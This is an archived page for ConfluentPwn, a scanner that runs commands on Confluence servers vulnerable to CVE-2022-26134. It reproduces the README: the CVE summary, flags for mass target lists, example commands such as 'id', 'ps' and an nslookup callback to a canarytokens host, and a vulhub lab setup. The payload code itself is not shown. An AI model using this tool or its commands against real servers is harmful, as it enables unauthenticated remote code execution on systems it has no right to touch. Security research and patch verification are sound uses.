Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-26134 PoC — Atlassian Confluence Server 注入漏洞

Source
https://github.com/redhuntlabs/ConfluentPwn
Associated Vulnerability
Title:Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
Description:In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Description
Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134).
Readme
# ConfluentPwn
Confluence pre-auth ONGL injection remote code execution scanner (CVE-2022-26134).

## Usage
The below GIF shows a demo usage of the tool:

![tooldemo](https://user-images.githubusercontent.com/39941993/172548712-6bf81497-99ec-48c2-b076-d8a472c85a1f.gif)


Here is the help output of the tool:
```
$ ./cfscan -h

  +-------------------------------+
  |    C O N F L U E N T P W N    |
  +-------------------------------+

[+] ConfluentPwn by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage:
  -cmd string
        Command to execute on a vulnerable confluence server. (default "id")
  -file string
        Specify a file containing list of hosts to scan.
  -output string
        Output filepath to write the scan results into. (default "cfpwn-results.csv")
  -regex string
        Regex to match the response header for the command executed.
  -threads int
        Number of threads to use while scanning. (default 20)
  -timeout int
        HTTP timeout in seconds. (default 5)
  -user-agent string
        Custom user-agent string to use. (default "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36")

Examples:
  ./cfscan 1.2.3.4:80 1.1.1.1:8080
  ./cfscan -file urls.txt
  ./cfscan -cmd 'nslookup xxxxxxxxxxxxxxxxx.canarytokens.com 1.1.1.1:80'
  ./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Specifying targets
Targets can be specified in two ways:
- Specifying URLs directly via command line.
    ```
    ./cfscan target1 target2 ...
    ```
- Specifying a file containing a list of URLs to scan using the `-file` argument.
    ```
    ./cfscan -file targets.txt
    ```

### Concurrency, timeouts and user-agents
Maximum number of concurrent targets to be processed can be controlled using the `-threads` argument. The default concurrency value is 20.

HTTP timeout value in seconds can be can be specified using the `-timeout` argument. The default timeout is set to 5 seconds.

Custom user-agent can be specified using the `-user-agent` flag, in-case the user wants to track UA strings in their logs.

### Output
The output generated is written to a CSV file, the destination of which can be specified using the `-output` flag. The default output file generated is `cfscan-results.csv`.

The output contains 4 columns:
- target
- confluence version
- vulnerability status
- command output

### Command Specification & Matching
The command to be run on a vulnerable server can be specified using the `-cmd` argument. A regular expression is specified to match the output of the command -- which can be mentioned using the `-regex` flag.

The default command which is run is the `id`, and the regex used to match the output of the command is `uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)`.

Using the flags together looks like:
```
./cfscan -cmd 'id' -regex 'uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)' https://1.1.1.1
./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Setting up a Test Environment
If you'd like to test out the tool or the vulnerability in general, then you can refer to this: [https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134).

The installation process is quite simple, the below commands do the job:
```
$ mkdir confluentpwn && cd confluentpwn && wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
$ docker-compose up -d
```
The app should now be available at `http://localhost:8090`.

### License & Version
The tool is licensed under the MIT license. See [LICENSE](LICENSE).
Currently the tool is at v0.1.

### Credits
The Research Team at [RedHunt Labs](https://redhuntlabs.com) would like to thank [vulhub](https://github.com/vulhub/vulhub) for providing the docker test image.

##### **[`To know more about our Attack Surface Management platform, check out NVADR.`](https://redhuntlabs.com/nvadr)**
File Snapshot

 [4.0K]  /data/pocs/650e6e6464858af3f78a6f83602a7ff54ccee9f1
├── [ 236]  go.mod
├── [2.1K]  go.sum
├── [1.0K]  LICENSE
├── [4.7K]  main.go
├── [4.1K]  README.md
├── [1.8K]  utils.go
└── [ 543]  writer.go

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →